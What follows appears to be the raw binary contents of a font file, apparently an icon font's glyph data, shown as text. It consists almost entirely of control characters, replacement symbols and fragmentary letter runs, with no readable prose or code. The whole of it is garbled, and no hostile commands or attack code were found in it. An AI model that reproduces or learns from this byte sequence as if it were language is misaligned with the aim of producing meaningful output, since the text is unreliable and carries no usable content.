!6'3462&"347'��zh=V=H@.����(_�`�+==+N.  ��UT�@�=!@�**��%'5'#"&4632"264&"n!m(5;SS:;S"�R::R9�n!n"SvTT;5(9R::R��15-5*����++������;C%/+"/&'/&?4&465'&?66?6;276264&"n/+6	U	6+-.+6	U	5+-�>,,>+�"G77	G	""G77	G	":*>**> �`%5"675��Oi()�ȓX49�U��	77'?�}!n�99�n!KK�`��`�����7537"&4632764&"53�0�(p�ppPA5!xXX|XX�����5APpp�p(!��X|XX|Xf00��562"&4'654&".5462&2'>54&".54�""�#)1D1)#IhIӬz9/&-a�a-&/9�""!9$0"00"0$9!3II�yU8^$L-DaaD-K$^8U��)<#"''7&'>3277&546;7&#"2654'327#"'X/96':2*MGI@f:..M��3%5Z%52


"E/MGMFCN�	
26�6%3� Ac%#"'=4&+"'3276?#'.'&767676?%567676'&'&#"567632�
		P/?
	��
	
)+-
o>��\)
	

a--"	�
	�

��f
�*
%/;0 1	K5
+5FY#"&54632&2##"&/#"&46326323747"264&"327'.7>&"#'&'3264&�,:()C��
+F&�f	
�

	
� ))0N*O>(	 
p
 ����&57&5474'./6?%&62&&"'767>?_2-M.&9-2'
*3M��)8�8+
�+B�B,49�IF=JfC"

!CJ=FI.

2CI	''�48JJ66/%Vk=!'7'7w��x�*x��x����%)/2"&464&"#6#7''6323&54'3'7#"������0pp�pp8�fH!81N<�fH!�8��1N<��������p�pp�pVV>��*7�Z~��*7�V>Z~����%'''75'77��h8VV8h��m<VV<m�@
� �� �
@� �� ����� ,-8EZgt7"&54?632"'&/&62'7/1&761&54?66&767.7>'2#"'6?6767'&7>'6�%W1	@>
9�:<+1"�2,
	(+G< "
�
 
aY\
#B/7
B"4"##2$68�@?	+
	 `Zfjn~��!!7&47##27654'&'&'&'"'&"#5334'.'&#5#"23&'&'&5#33527>5"&5#346$42 42'"#52'>3.545!��!!a&�

�&a!!q�t@@�$�`� &t&&P;
			#
		P&&t&@@@@+�  �Fp!!%4'&'&+"2767653#"'&'&'&5476767632#54&#"325'53#"'&'&'&5476767632#54&#"325��5$ff$58(�(8\5+

%4�5+
&4����,$66$,B66B(

*
(

*
����-B2#"&=4?6'"/&546?63#"/5&=4632��
�
���.
���
	\�Y1a`R��\	
�Y��@�,%1#"'&'&'&=>76'676/267)1U
E!1Gf�'+/)H
 *S0$H<gG���7&67#".654&/`G !_ "+"R

)

(�M�5(>*)?(MSD(

$,(

$����"2"&=4'&54264&"���	 #&4&���jj�j�/!
(,!%SW"�
!Q&&����2E2"&4327623276'&#"6'&#"#"&'&#"32676'&#"3276232������G		

0	
<%&<
L/.J!


		������Z

	
D	"('\	



��*?7'&47>76767'4&5&737.'&'.'&6765762��""S)	

[	h.}""D+W�S
�#e#
)8l+c	�#e#F< ����$,4<%2#"'#"'"&5475&5462;6&"264264&"$264&"@&&$
]B &4&  &4&0@
�.�&4& Js$&&$�$&& 5 ���n���"F#36;#"&=32276776#"+"=4"+&'"4#&'5467�w5#5K<|<=

@4H!1 
3!J5���:!
A/����@.
VU.A����$,4<"&5475'5&546275&5462$"264264&"264&"� � &4& � &4& `` &4&��R�`$]@5$&&$5@]$&&$5005$&&��.����!0B2+"&=46354&+";26554&";25754&+";265R.@@.�.@@.!z"g�B/�/BB/�/B�f
e��f
e �`A7#"&76767632&'&'&#"'.76&+;.'&'6`>HF8+9@\+9@\??UY&S�i�%#&%=_B>6$�&#W�#W?
$-7@.g
+*� 15333353� � ��� ������#:B2"&5475&54264&"264&""&54754'&#'76264&"&4&  &4&  2?!&4&
'``@ -�&$�$&&$�$���&&&%�@``@4���
 +#546;#"%2#54+553+532!3#"&=300$CD4#0
CP0#DD��DC$0DDD#00#DD0��CC$11$CC��
"3#4637"3#463�>B�`"�>B�`"�B>�"@B>�"��`�	 (&/'73+'32"&4264&"62"&4P@%>mS>%@�C55P5jKKjKXP88P8;J33J3�`�/��/�`pp�KjKKj�8P88P�3J33J���� '2"&462"&4264&"327'#%#'76�J33J3#jKKjKXP88P8
+B"00`-S`0(- x3J33J[KjKKj�8P88P62JjP��PXb
����3F2"&46767676'&766'."3276323276'.76������q	
	
2	�
	/:/	
0"0	2
	
	�������
	R	

	Q	
���� (,7U]#"&46327>?264&"624"&'&712#"&'&'&'?37757376264&"U: !!	&����  !X��!!
	LV#$ 

$&4&
%
;��y� 	x;�m&4&)		%
`��>�-1N2+"'&54636&+"27676;26?>72+";2+"=43.
1Hs��N>
:U
	K@>
6F)93�#�
|@	��&Ym3,	

$	?���>�=2+"'&5463>76&+"7676;274676&+"&=4;271Hs�3�	F	@	R
`
�9mR	
�
|��Rm
	��T
-


�'6E#"&54767&547"#"&5476;&#"32654&'654&#"327�%+I>59(E'.!"9j!D,2)$'
#
"n%'!	
&9*&

0'�$#w
 <
: �)8H7#"&54767&547#"'&5476;#'327654&#"4&'"&#"326�KA8;*8*#%:�<

k
	y%,$#�(;.(
!*!
z
6
���#8#!"&5463!2"264754+";22=##"&547#3��� �B//B/P004 !/.B5
P��!T/B//B?00��
/ !B.�	��)>642'#54763!2#&'&#"54&+";276653#!"'&=332p��U T!/.�&&P P
��Q !./p���p
p!''� /��/ !��@�(7}�7'&'&54767655654'&'&'676767#5"'&'.'35'.'&'&54767676753#&'&'654&'&'&'&'#/53&'&'&'&/5#13&'&'&'&'#35767676}
	
	
�


	
	I
@E 	@E


	

&
 	


	$
 Y�f\

	^
	�I	
	k	D
##2
	x
!! j

W
	
	�

	�	

!!��@�EP_%#5"'&'.'35'.'&'&54767676753#&'&''5654'&'&'67676;
@E 	@E

�	
�
	
	�
##2
	x
!! j

O\

	�	
	k	@�@$2"&472+"&463264&",((05KK5�5KK5�B//B/�((lKjKKjK�/B//B@�@'#";264&'2+"&463"264&2"&4@�(88(�(88(5KK5�5KK5((QB//B/ 8P88P8 KjKKjKP((</B//B����*3=;!53275&'&'&'&'=35;3&'&'#67#6�)#*)
�
[,!)P��Q�s33k35YM--
!
  .$-*7@#s51V/$$/V1��''5'.'7��\��  f
+)..)+	��o<Uf��PR$$RX����?753'7'7'7'53�000�0�� �-.�--�.-@�000��0��@@--C--��-.x  ����2"&45#5##335z�zz�z;V*VV*�z�zz�k*VV*VV����
'7'7'5&2"&42654&"�b�aa�Ue;�qq�q�|XX|XC!R! S!S�o2=Up�pp��W>=XXz����2"&45#75#z�zz�z�000�z�zz��((X��	 @`#5353#53'5335373+535353P(P�PPP(P(PPxP(PPPPP�PPPPxPPPP�PPPxPPxPPVk7'7�x��xk��x��w����
2"&47#z�zz�z�`��z�zz��`�!������
"&4625�z�zz��`�zz�z�`�@�@'��@������
"&4627'&�zz�z�``z�zz�
``@�@��@������
"&462'�z�zz�
``�zz�z�``�57�����Vk7#'7'�*x��xw��x����'3"&=462"&=326=4&"265� EbD2F3. 
.2F3@�1DD1�#22#���		��#22#��7'5!3!5337!����k�kK�+�ꫪ++��((*��*2:"&4622"&4264&"/#5'&4?63232"&4264&"9L77L8C6&&6'+' =	H	
";��L88L7B6''6&=�8L77Lg&6''6�-- pV&
	E	< %8L77Lg&6''6����"';7'&76?546;7332#"'#"'#753#"'"'+26?243&@`@&3/''./&&0+��+9$2(Z(2$5'\#�	
b55b

�++**T))T��$  �
2'463������@@X����)-1"3=7>54'#5'%'2#5.54#5!#5P80@K*�&��&&�hL@�#`@��@8(8
GG
,(�@@6&&&&L4J%gg;#4****`�'/7;=4>2+"&=#+"&=.264&"264&"75!58P85
		
�
		
B�@�`�##�
'				'
	ijj����2"&4'7''7z�zz�z8KKKKKKKK�z�zz��KKKKKKKK �`!)-+"&=!+"&=76;2264&"264&"'!'#S-		�		-�����* �Kv�				�v�YU����$,62"&43!2+;#"&54?'#2"&4i""PD4
K���J*5""F""_*� (3���""��2#!"&5463U�����*��!!2#!"&5463U��*��U��U��*��77'53#!"&546;#iB��`
+�����B��`���*+����2#!"&54637''U��j��L���*���M����77'3"&4632&#"26{@��]*z�zzV(& Eaa�a�@��]
Vzz�z a�aa����%2#!"&546;>2*264##5#U��W#,#5�(�(p��:

��@HH������2"&4264&+4&#"#"3z�zz�z.1"-&%�z�zz��,#0#&2% �`%#!"&5467>327''�'6;)��2F>-G+6R��o,�9();F2.D%,Eƍo- �`&%#!"&5467>32264&+54&#"#"3�'6;)��2F>-G+6R##@.&:
!//!�9();F2.D%,E�#2#
.@-#/B/ �`%#!"&5467>32�'6;)��2F>-G+6R�9();F2.D%,E��%-52+"#"&46264&"6264&"264&"264&"�Oq?,&
	Ppp2S}S�dG,>
	p�p�Ch����62"&4&2"&47�C�����U�U�ք������U���=3#=3#553#3#53�33��MM�3M3�M�M�3�̀3M33�zz57#'76�P�Pz(P(3P�P�*(P(3@�	75!+"&!5373 � ��Pj+��F    ����2+#57#"&54635!��*�*�j�����0  0����@�
+"&54633'����pp���P�p-S	
'73'7'7���|��z\� z4����{[<{.�R?'7z� ��z l���z��%#!"&=4?7'�����૫����ee�pUU�� ?#53'72#!"&=3!!#5463�7��8kk���+*��+s8*8kk+��UU*UU��%53#5#53#%#533#53M3�MM�3��3�MM�33M�33�MM�3��3���-2'.54632667654&#"'&#"7.0B;.44.;B09%%_(0"**"0(_		�B15D,00,D51B,,��X"2*#0!!0#*2"X��3'.54632632�4.;B09%%90B;.40,D51B,,B15D,0@�#'+3#5##5##335335#75#75#5#75#75#(((�((((�(�(((((�(((((���++++�+++�++V**U++�++V**U++ �`2#!"&=46;54#!3!2����+���j0��0��0�P753!!5!�`����@P 000 0y22����(}2"&4>4'&'.7676'.'&'&'.74'767'&'&4'.'.'263&'/>76636.'&#66z�zz�z�		*4+�#

 ,	

	

 )$!	

6�z�zz���		


0DJ4++#/	&
	 	



	 
��`�
25"&45#3375#33g�geKIg�>g>�eGD�$Gf�R==((==(����%2"&4264&"6"&462"&462"&'3z�zz�z��aa�a��NH9
�
�z�zz��a�aa�Z�'!!��
3#5#7##5#�b>��>b`������#%3#!"&53"&5463!2!264&"�KA��AKj��j� 
��5����
��2#!"&54635#75#75#X��Ƞ�������0��00X00X00��@�'2+"&=46;5462264&"754&"�;R;t  f$4$��();;)(�  �($$(��2'"#"54?6765'uy�iy�gs����)-)B)-(���,�@�@=!%5!%!!���������@++k**�+����!+13%''#5.53327'#"&='7''5462'65'<:::"_!.9P'H1 
)�o�	�)8)\R"]:::!_RRX92C!(�n�	M�((�.&�!�@�62"&4$2"&4&2"&4    `  �       P`"&462"&4626"&462P      H  ��  `  @�''�������@@��`�&,#3/=4&'.2!57546754"&5�",	�	,"-;)��);-H"H9$r


r$9H
I/r**r/I
����l� "&53'!57547'7'675462�"R�'$��)?%�-;L��$)s!@�^�

I��`�"&537!5754675462�"R^)��);--;d**r/I

I/��%53#!"&546;#3#5'7#U+������+��W+��*+��U�W��	����'+/;=!353"&=462%5335!"&=462'5!353"&=462`P`��P`���`P`      `P     `P     `0�P	&%"&4632#"&46322!54%2#54&'61$$$$�$$$$FZd��12]��#2##2##2##2#,& 66 66��$"&4622!5453##5#5353HP88P8�x���@@ @@ �8P88Ph5+00+� @@ @��6"&4622!54�P88P8�x����8P88Ph5+00+0�P%#!"&=463!2!5!���n�� ��Y����� �2+"&5463#�������n�� ����@�2.54264&"^�^P((7*#�0!!0!�\A4�/.HDV!Ay!.!!.����%''575575462��0PP0���p0rr0(hq

qh��
2#!5#54635#!5`&P�P&�� &�UU�&���`PP����2"&4264&"z�zz�z��aa�a�z�zz��a�aa�����2"&462"&4264&"�V==V=�zz�z��aa�a(=V==V�z�zz��a�aa�`p72673#"&46327#7&#"�*C.]<IggIH44�F&67MM<.&8Hg�g44�F(MnM����2"&45#z�zz�z;��z�zz�k**��7'&47''67&67>t[�V!����0M0
@�YE�����0>0K����
%62#62"&4264&"6"&462"&462�B6��zz�z��aa�a���#z�zz��a�aa�Z����$$2"&547'#"&46327&5462#"'&4$$4$�&%�&4&&��h$4$$X&4&W
&&4&W


X��	%'7'?/?/�n!}}!n�99(<5F�`�KK�`���$D.@���	%'7'?/?/?�n!}}!n�99(<5FF5<�`�KK�`���$D.@@.D$
��`�%)2#!57"&=4264&"75#264&"75#\�\+ � +Bpp�@p�"3�++�3��~``�~``
����#'+/"264'#5'%'2"&4#5!#5/'#5P88P8K*�&��&&�hLLhL`@��@n&&�&�* 8P88P�@@,&&&&LhLLh****�&&&
@@��@�2'654&#'755"&547�B^G1PPPPB^Gc`C0'2H=RQ��=RQ=`C2%2H��2#!435#35#35#X��@ f&s&s&��@X(�((((((����2"&4264&"7'5}�}}�}��cc�c�`p�}�}}���d�dd��o9C��`�=462#!57"&6264&"75!\�\+ � +�  ��e�3""3�++  �``��@�%2+"&=46;54&"#462264&"��$4$&;R;t  ��($$);;)(�   �`%#!"&5467>323'33�'6;)��2F>-G+6RhDddD@�9();F2.D%,EoddL p37'#%5UkkU p��p@0�1�p37'#UkkUp��p�� '%4&'5'6'''567''#537'7'5V</@U �3�($._kUU	[3�3R-lE6* �h3��(!
-
_�p�
[�3<1��37'#%5'5>4&'UkkU 5@UU@/;;/p��p@0�1�l�l-RfR���"&462'#5'##576323�  (9&29(Q)(o	-HP  �&>`�`D�@Pp&E(����
'5#75#���000��`@00P``��@�#'&4?3264&"@=�==��FdFFd
�0ss0�0ssKdFFdFp!4A%"/"/&4?'&?627627#!"'&/763!24#!"3!2�LLLMLLM�
��
nn%*��``
*tMMLLLLL�
�	
������p4#!"'&/763!2'76/&"'&"2?2?64�
��
nn%*HLMLLMLLLb
�	
���LLLLLLMM0�P3V7676'./6767#"&54632&'.#72#"&'675&'&'&'7&/5>�&	(&-
S! U'� L#ER�"3
"PW98XB 	

�X89W?		"
B����5353!#535335#53@@@��@@@��� 00�@@@���@����#75!72#!"5435!73#73#'530` �`����@� � p�������PP�00��P 00 �`*]$42%3"/.'.'.'&'&63673+"'&=4?3272>76'`���
6
	H��		#'Sbb�@	q1��
	]S		S~�.4<%+"'&?5432632#"'3&54632&=4323'&"&462~��v		#H.5!


ǖP;
��E6
�����3BP^%#!"54?6=4&5&6;2654/&=#3!7+"&54?3'32?4'&"6/&#"32w	?��?	11~?e@c�	QgRW14
44IM &\])��%2pp0'�%	||F=$$����*=EM%#"&'&763232676327#"'&"#"'&7632#"'&"#"'&7632&2"&464&"cJ./L
<&%<
	
		
�
		

�����0pp�pp�"'("	9
	



	


��������p�pp�p����3;CKQ''#1"''7&547'&546732674627'6;%7&4&"2654&'&3#53�6	9+$#4FF4#$+9	6."6*0
	1*6".��[
%Z^�^^�[%fp`4	4NA1-
+11+
-1BM4	4!04

40!Y(��\\�\cY(X�����39''#1"''7&547'&546732674627'6;5##�7	9+%
#4FF4#$+9	6."6*0
	1*6".�`4	4NA1-
+11+
-1AN4	4!05


40!�����!!!75!%5!��`��@(p��00��0��@ ��!75!%5!��@(p��0@��@ ����/8d#"'.?6327&#1"7&'&'&'&'6'&'32''7''7''7''7''777777'7K('�U('��*$9/M�"/M�Q*$vCC;[TKU[TK65��/�!:"/�!:q65�CC����CG#"'.?6327'77''7''7''7''7''7'77777'K('�U('���HCC�;[TKU[TK����CC������_"27>764'.'&2"&4"'&76767>76?67632'&'&#"'&'.'&"V&#>>#&V&#>>#������L

	
!

 �>#&V&#>>#&V&#> ������( +
#)%-����F2#"&'547>654'.'&"3767>76?67632�]�zN[�
~%>#&V&#>
$
		��]J`�[Tr�+&#>>#&+	(-, �`'17� ��@�� ��`@ '7-��� ��� �`71'7 �� @ �� � �`'7�����M���� �`7'7���M��� �`7"/&64276�WXJJ~OPC��C`@7"'&'&4?6!2#!^OPC��CbWXJJ`@7&?!"43!'&6"�C��COPbJJWX �`/"5&76762�JJWXC��COP`@ %''7-����`����9�Gu�753#"'&'&'&5476767632"'&'"'&'.547567>32733276767654'&'&'&#"32767676'6?&'&'#'&'&#"327676�


			


"	&


	




V
	



#		

	f



		 
 9
	
	9Gv�73#"'&'&'&5476767632#"'&'#"'&'&'&54?67676327333276767654'&'&'&#"327676'6?&'&'+5&'&#"327676�





		'	
		

F	�

	#			


	h		
/7
@�@#53#33#535#53!5353#53753P@@PP@@��P�7@��ఀ��� ������@�@!!75#5#75#5#75#��`PPWYP@�@�� ������ ������"Ks�%#"+"&=46=>71632'4&#"#77777346%;&5'7&'.''7&''7&''7.'&''7.#>7&''7&''7&''7&''7&''7&'77777�jIVzgIVzpO	


��pO	


	�B_
	
		B]	

		�IgzVIjzVOp

	Op	


	�]B	

_B		



����S�21#"&54671627&'7'&'7'&'7'&'7'&'7'&'277777765&'7'&'.'7'&'7'&'7'&'&'7'&'"7777�Vz	vPVzjN		

		



	�


			
�zVNjzVPv	�q



			


	�	



		����%-7CNV2"&44''&#236742'67&67&'7'&'6'67'&'&3263&'&'67&'z�zz�z�>'3B!�K5^KA#,/)!I
EY\?�+:,#$8Q
1�;D7:�z�zz�VS92-

�(&#/.(;)N<y7HJB
E')/F+C5"�:&!&"3M,B����Q2"&4&'67465&'&'67&'"'&'&'"#&'&'6727&'676z�zz�zM:7D#!AK^	YE
?\#$#,:41
,6!�z�zz��HB,

-2./#&W<N)'E
F"	&!&H7>J	��-3%!>	5475462!&54'&""&'3>��

ff��*(%X%�(h�#

y	

	��(fE FK#_��%%!>	5475462"&'3>��

ffj(h�#

y	

	������@w"264&2"&42+"#"&/&+"+.?576'&+"&463"43!2+"1#"/4'&'&+"+"'&?5716'&#�4((�

d 
	

 d

Pf 		 �"((T
&�
	xx
�&
 (�x
x�*����:422+'&/'&'&+"5'&'&?576'&'#"&463�`x

b		b

@``
(�		x		!x		�(
��	;7+?37#�dAdA.`�`<�Y������37#�`�`�����"2@2+&#"#.#"+5=46326=.#"36327=&#"632,86..98,G/$#/96�P%/6;�)&��*%%*		&),,���
��$�5!��+$��%2#.#"+5=4632+&#"#6d;.98�,86.���%*		&))&��*%a��,3F2+"+54+"&546;21634&+";2?54+'5#"6;26����

"	�	�O		@ 00	�	���

��5��@dd���  �����/53/72+"+54+"&546;2746;75(@	P���00tt_��


��I	�  �0@P $7+";24'2+"&4637#!5#55!%5!�?@@��� ����  pP��P���000@P75!'";24#'!#!# �@�@��0���  �P��".3!3533=4;2353354+"5!%5##5!#5#p0�`0 0c0 �a���  �  @��@ �����00��"*535!5313!53353=4;233'54+"0 P�P 0�`0 0c0 `a@����@@@     ��!!%!#53!#50�� ��p@0��0����p��0@��	!!!#5#0��P0@�0������ �#+3;CKS[c53'3572+"&54634+";2';#53;#53;#537;#53;#53;#53;#53;#53 ������� @ @ @P @P @P @ @P @ @@0  0��@��@���@p@p@�@ @p@p@ �`
 �#'+/32+"&5463#35#3#35#35#3#35#35#3'35#��0000P000000P0000000�����@؀�0p0�0�0p0�0�0`0��!5'3!3533535!5##5##5#`P`��`�P��`P�PP@@��`   ����@    @��1!!5335335#53353���`����`PP0000    0�P;CKOS2#!"&=46;533>;254+'&'./#"+"3!2&2"&4264&"75342b

��
"
XL>X	<@�F33F39:)):)��@ �
�
ϰ	�
�2F22Fh)8))8^b@@0�P#'/72#!"&=46;533>;2264&"75#&2"&4264&"b

��
"
X�F33F3�}:)):)8 �
�
�2F22Fe)8))8<��.262"&424"62"&424";#"'&/&'&#527%V�H����
+!(�� 0 �0"��c���&62"&462"&4;#"'&/&'&#52V�X����
+!0�0"�����	3#5!#5!##'#%5!35`p � 0
@���7���p`p�@@��77����
##5!##'# �p� 0
@��pp��@@ �`@"76;6323327654&2#"'#&#"3#"+&7654'1'&54	�g
'
 &H52��qoP+ 2	PQ9&#	)
('79aZ@?W9&.@ �`"2#"'#&#"3#"+&7654'1'&54q�qoP+ 2	`Z@?W9&.@r�7"/77J
8/}v8/~����"/72"&4264&"$�
8/-�zz�z��pp�p�8/�z�zz���p�pp�����2"&47''2z�zz�z��}/8
�z�zz���~/8����2"&4264&"62"&4z�zz�z��pp�p}�^^�^�z�zz���p�pp��^�^^�����2"&4264&"z�zz�z��pp�p�z�zz���p�pp�����2"&4264&"753#5z�zz�z��pp�p�q�z�zz���p�pp�O������
2"&45##z�zz�z�`�z�zz�g��`� ''7'7�TTTTTTT TTTTTTT����"&4664&"''7'7&zz�zz�nn�nn�TTTTTTT�z�zz�z�rn�nn�nTTTTTTT����"&46'7''7&zz�zz�TTTTTTTT�z�zz�z��TTTTTTTT����D7537'72+5;264&+54&#"'&#";#"&5467>32>321�77KJ�"/0"ea&';*1


	+[[%5"!9"0EC6��6II�0D0'6()8	$,4%-	#C0����(7537'?2+5#+"&5467>32>321�7KJ�"/0"�#F%5"!9"0E
kk6II�0D0��4%-	#C00�P8%2#!"&5467>32>32264&+54&#"'&#"3!o"/0"��%5"!8"0E'&;*1


	+�0#"26&-	%E0�)8'*9 	%-��D7'7'#572+5;264&#'54&#"'&#";#"&5467>32>32�JK7�"/0"ea&';*1


	+[[&4"!9"0E�KK6��2#"1'8**9 
	(,4&/	$D0��(3532+57'7+"&5467>32>32��"/0"�7KJ7#<&4"!9"0E``2#"1�6KK6�4&/	$D00�P%2#!"&5467>32>32o"/0"��%5"!8"0E�0#"26&-	%E00�P1U7""#;264&#"#'&'&'232+"&5467546276767&'&'&547&'>7673}%

�*&&�."2"&		
,#$2�%

(#&6'  .b

'#!*()	3#$/�P3%27#654'&'&'&'5>7673'232+"&5467546i!3 
,#$2�*&&�.�
&")	3#$a#&6'  /` 1""#;264&#"#'&'&'232+"&5467546}%

�*&&�.%

(#&6'  .` 232+"&5467546}*&&�. #&6'  .��?�����%'''#/'7''7''7/5?'77'77'7?3777'?5/7''7''7'/#'/'7773?7'77'7&2"&4?&#"27'7654'&'�!"
 	
###$ 	 	#!    	 	!!!!!! �jKKjKh.Bp) Kh	!�!�"!!"	 	
 #
###

	P!!"!!" 	 ! �KjKKj5hB�K!&+.!i��X`'7&546327#"'&%'''#/'7''7''7/5?'77'77'7?3777264&"�!K
hB.rhK ).!!!"
 	
###$ 	 	#!�jKKjK*!.+Kmh.B�K!,"!!"	 	
 #
###

	�KjKKj�p)4=FO\i%#"'#"&5467&5462'632632654&"4'"'6&263&'2'67&#"#767"&#"27&547&'2654&'.$.B.0  0.B.$B\B�
0  0
8P8p
(T
0(�P9(�P8(9�
<&.B""B.&<
.BB.""(88�=.
.�$83!(88(!38$�pDOXaj%#"'#"&5467&546267654'6767'"#5&"'&#"&#"""17&54727&'632""&#67'2&'26.$.B.0  0.B.$B\Bp9
0  0
9P0
(NT(
0�
<&.B""B.&<
.BB.�$8
""
8$^O.
>1
.	��#7/5353753!537''?'7�"�7��(P(�((�*�" ��d((�((tb������75353753''777'53�"�   <@"--�----9@!��"C@@�@@x  b-..z-.\  ��	%57!!#?#577/7620���� ��� ��0��� �����?!!7#57/762������ � ����0�@� � �����82"&4$"67654'&'&'&756'&7673654z�zz�z�p-(2	''
2+-�z�zz�ipOE5



	
5EO����32"&427&'&54767676'&5&76'&'#z�zz�z�X:+2
''	2(9�z�zz���E	



E �3#57##355##%5'#�@P%K0�0�� A�`@P K��0P0�� ��0�B�� �7;#3+55#5# �� �K0��@  P��PK�� 0p@P��	
533#5353!#!@ �� �0��@ ��P00� ��  �� ��	
533#5353!#!@��0��@��P00�����0@�3!3#!#537'�����p p_77JJ0��0��\7��7JJ@�3!3'7''53�����7JJ70��0�7JJ7�PP�`=!%5!%5!`��`��`�88@�@!!?!!5'''7'�������
`sDO00ODs@�t|��XMF%%FMX@�@%!5777'7''����DO00OD���@�dMF%%FMd��P�0 (0@%#"./767632"32>7&'&"&462&"2643"&463"26266'G&%7'01^^,N06*4#G'%%/B//B/64&&4& (�2$""%8/16#")�/B//Ba&4&&4(P�0'%#"./767632264&"7327"&463266'G&%7'01^B//B/J(�2$""%8�/B//B>(@�@?7'5�(������%�edN_d���{{{@�@5�����@��{{{@`@	!+57''32653535#"&'#3 @��@
-�0(0�--b#,#b�@`��``DDPPPD���@`@
"62673+53'+735335+"&5+�,#r��r79@�@8(('	���%`PPPP`
�h#'+/3!!75#75#75#75#75#5#75#5#75#75#75#75#��pH888888888(���(888888888h��00@00@00@00@00�������00@00@00@00@00�h#'+/!!75#75#75#75#75#5#5#75#75#75#75#��pH888888888(�(888888888h��00@00@00@00@00p�00@00@00@00@00 `1267##"'&#"#=76323265"#"'&#"63232�

!(9+(:		0( 
9/P�	
���	��	�
	 `267##"'&#"#=7632326�

!(9+(:	P�	
���	����<#"&'4>654&/76'&'&54?67676`G`"+" _! (

)
y0"11	.-	�5�M/DSM(?)*>�p$,(

$,(
�FQ8+<?3& ..		-/����#"&'4>654&/`G`"+" _! (

)
�5�M/DSM(?)*>�p$,(

$,(
����9EU%#!"&'4?5#5;3#3#3#3#3!27654/=;#73+"547#1;2764'1u#�%t00  001:\
	t�H�H
,�.�C	�	N%$�  �$
���ww((xo
����"&*.2>%+"&547173#!"&'4?5#53#'353535354/#;2G	�	C�q#�%t�p00  0A	:�
H�G.�,A
ob%$�o000�ww(����S`kv������������&4=KWeq%"'#"'&'"547&'#"'&767&'#"43267&'&763267&54267632632'32767&'&#"'676765"7&'&#275&#"67'2734'.3654'&'654'#6&264&"#"'6&/6'&'&'&763247&'6?#"'&67"'332%&6763267'"#"2>?#"'&7674&5>'6326'6.&7632263&'&#"##"'./237&'"#k%82<-8-<28%UU!<4<,8,<4<!U�+ '
�'
6 +/
P',�(,\
y

r
m""9
{*"!"

		�
�

�	
).
d.		
)

�=-2<!UU!<2-=8 <,2<!UU!<2,< 8
_'
f''
P
_',
g'(
,//�|//

��2#""=
l"#3@�
�$	�	)'

�.			+'.
:
}
$
	����IUamy����%2#"''&'"547&'&767&'#"43267&'&7667&5426766#"'6&/&'&7632#"'&76?67632&>?#"'&>'632&7632.#"'./kUU%82<&=8=&<28%UU!<4<<8<<4<BS8")"�!*"��
��.
	
)E.		
)�8=&<2<!UU!<2<&=8 <<28%UU%82<< ~"2#"�#3$"�R
�	)'_			+'�X
��'42#!"&546;23'"63!254+"/&#54#!"3!2�


�p
p
�	��
'�p�`
��
P

J*������
!2#!"&=43%2&#!"546;23�
�p
�

�Pp
�
�P
*J

����#*.5=DINS2"&42637'5#2332?75'37&'7&'77/767''7&"''67z�zz�z�j�+R9!1GNFEhy#7:G6��F1�F62C/0+6 +�+ 8�z�zz���@''A(1%�/@<:�::HH2(5F1(:<>3)'M�)3.M� ��%22%����&.52"&42637'5#233275&'77/767'z�zz�z�jT9!1G�#7:G6��F1�F62�z�zz���@''Ar/@<:1(:<>3)'M�)3.MR�.#+3<LX72++"=#"=4;54;22#"4'2#"&4632#"&46'2"&547#";27654&'2+"&463�###�]#�'8&�&8'.AA.�.AA.�####'&*&&*!4)**)4>^@@^>R�.'/7@H2+"&46354+54+"#";;2=3224#"264&#"6264&#"24#"Q.AA.�.AA.9####x2>.>^@@^>y####&*&S5& �`#+O}$2"&42"&4&2"&424"62"&42"&4#"'.+"#"'.7>76322632>&'.'&#""'&#"32767676;2328�  &&�8Z+ ;; +' 

:6:

 '$	(4(	$

>>
� L""$&- !BY	4		4	YBFF		F�E-C?

?C-E �`'/7?GO62"#"'.+"#"'.7>76322632264&"264&"264&"6264&"264&"T&&^+ ;; +' 

:6:

 '��  �88�&BY	4		4	YBFF		FU""8L8��_�2"&4264&"7#"'6326763267&76763267&'&54767&'#"'&'&7&'#"'&7327&#"&"&'6'&#"&'64'673276'672�P88P8?B//B/								_    D    D 8P88Px/B//B�				 D    D  ��3;$&#"&"&'6'&#"&'64'673276'6727327264&"`  D    D �B//B/�D    D    ~/B//Bd�+3;%3##"&514&"1#"'&'#536763262>32264&"264&"�#&66&#$ 1"1 #x@--@-�@--@-�"6&&6"!%%x-@--@--@--@d�+%3##"&514&"1#"'&'#536763262>32�#&66&#$ 1"1 #�"6&&6"!%%��#3##5##5#535#535335335#�ppp�pppp�p���pppp�pppp�����#753!!5#5##5##3#33533535#5������`P�PPPP�PP�����PPPP�PPPP��p=2&'&'&54632>67654'&'&#"'&#"67>G5D)(<*	7<()D599c		>>		$&*  *&$p>6721'$'1276>�/--/  �p2&'&'&54632>G5D)(<*	7<()D599p>6721'$'1276>R�.6"&4627#67654&#"#432K


D"R


i&>����%-2"&4264&"72#67654&#"#42"&4z�zz�z��pp�p�#=


�z�zz���p�pp��&>�


����'2"&4264&"7654&#"3&632364>z�zz�z�


3"D	�z�zz��


i>&

��#5##55'353''7535#��p`p0��P�@��� @ P�Ѐ���tt���p���`-
*C��#5##57''753��p`p���� @P�Ѐ�а���`-`� 3#"/&#"32?#"'&4763232764'&#"'7632�('~"!!"+
*(''(~!""!+
*('N{@*)N{@*)X�(1#"/&#"32?#"'&476323264&#"'7632�.-}''.--.}((''.-
V{8&&V{(:(&&`@(
423#535#53(@0((�x����
423#535#53&2"&4264&"�(@0f�zz�z��pp�p((�x�z�zz���p�pp�����2"&46"2645#5#3#z�zz�z�0�z�zz���x����=EM"&4632632&"26467654'&'#"&547&'&"2762"&4264&"z&y�{{VB6




"R""#$N$#�P88P8?B//B.96CVzz�z&$


��%$&'$
